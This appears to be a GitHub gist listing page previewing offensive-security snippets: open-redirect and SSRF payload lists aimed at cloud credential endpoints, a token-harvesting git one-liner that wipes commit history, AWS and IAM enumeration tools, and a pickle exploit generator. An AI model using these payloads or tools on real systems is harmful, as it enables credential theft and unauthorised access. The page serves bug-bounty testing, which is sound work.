Skip to content

Instantly share code, notes, and snippets.

View smiegles's full-sized avatar
💭
Not available because I'm busy

Olivier beg smiegles

💭
Not available because I'm busy
184 followers · 11 following
View GitHub Profile
@EdOverflow
EdOverflow / open_redirect_wordlist.txt
Last active February 21, 2023 14:30
/http://example.com
/%5cexample.com
/%2f%2fexample.com
/example.com/%2f%2e%2e
/http:/example.com
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
@jobertabma
jobertabma / extract-authorization-header-for-vcr.rb
Created August 24, 2017 18:29
One-liner to reset last 1000 git commits and extract the Authorization header to look for tokens from VCR cassettes
# VCR cassettes stored in JSON
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.json').map { |f| c = JSON.parse(IO.read(f)); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq
# VCR cassettes stored in YAML
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.yml').map { |f| c = YAML.load_file(f); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq
@jhaddix
jhaddix / all.txt
Last active May 12, 2025 12:14
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@PaulSec
PaulSec / aws_scan.py
Created May 10, 2017 08:05
Quick script to scan for AWS (S3 Buckets) and retrieves bunch of info out of it
import subprocess
import argparse
import re
import sys
import requests
def do_dig(domain):
command = "dig {} | grep IN".format(domain)
try:
output = subprocess.check_output(command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
@darkarnium
darkarnium / EnumerateIam.md
Last active May 19, 2024 20:31
A quick and VERY dirty IAM enumeration tool.

Enumerate IAM

The following code will attempt to enumerate operations that a given set of AWS AccessKeys can perform.

Usage

Usage: enumerate-iam.py [OPTIONS]

  IAM Account Enumerator.
@jstnkndy
jstnkndy / gist:eba012a1265d8d29127314f26156f7a4
Created October 20, 2016 21:32
This file has been truncated, but you can view the full file.
.0.0
%00/
.000
.0.0.0
0000
00000
000000
00000000
000000000000.cfg
000000000000-directory~.xml
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active May 6, 2025 04:20
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@bl4de
bl4de / pickle_exploit_generator.py
Created January 30, 2016 23:42 — forked from 0xBADCA7/pickle_exploit_generator.py
Python cPickle/pickle exploit generator
#!/usr/bin/env python
'''
0xBADCA7
Vodka goes down the throat better with pickle.
This script generates pickled object representation. Good for CTFs.
Params: [1] function, [2] parameter, [3] pickle type
Sample run: